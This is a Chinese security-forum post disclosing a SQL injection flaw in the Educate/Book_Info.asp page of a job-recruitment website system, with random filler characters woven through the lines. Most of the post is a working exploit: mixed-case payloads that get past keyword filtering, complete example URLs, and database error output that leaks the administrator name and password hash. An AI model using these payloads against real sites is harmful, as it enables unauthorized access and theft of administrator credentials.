找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2319|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp
4 z5 X% G1 L! Y: C! w7 p" ]" E5 ?
8 \5 C& G( v9 f8 V此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
$ c3 m) X6 g* l9 I1 V- A' }6 j ; l, c1 U7 k2 D" r  n1 I; J
exp:如下+ s: M7 x1 q' t' Z
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
0 [9 O+ `) Y% \! V% {查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)/ O" I" N& K$ t# w; h( R
! G5 p! L5 F: @8 C
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 I  U! a0 {* B% E/ D4 P6 [
, _( n: v3 p9 P, _8 R% f
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
$ A/ B" V- i: {" @# ^$ W
5 v' ~' q; y* B2 D将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。; r" f& Z3 U: b3 ~
, U5 Q$ P6 M! ~. [
/Educate/Book_Info.asp,行 81 l- a7 I. g" F1 e3 B# {- Z
3 r' i6 r1 v, Q- g2 y# O3 L8 {2 E
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
9 Z9 ?  L) K3 |4 R( H 7 h( y1 T* ?9 ]9 }6 z, `) Y
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'  V5 I' r9 z* M6 ?6 p; X7 n& o6 k
& o; \# u8 k: @3 Y: e4 w3 q
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
- V* Z- r" |$ Y  M& t" x
' z! b3 x' f5 m- `" d/ n/Educate/Book_Info.asp,行 8
) i8 P* u+ x3 a8 v4 s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表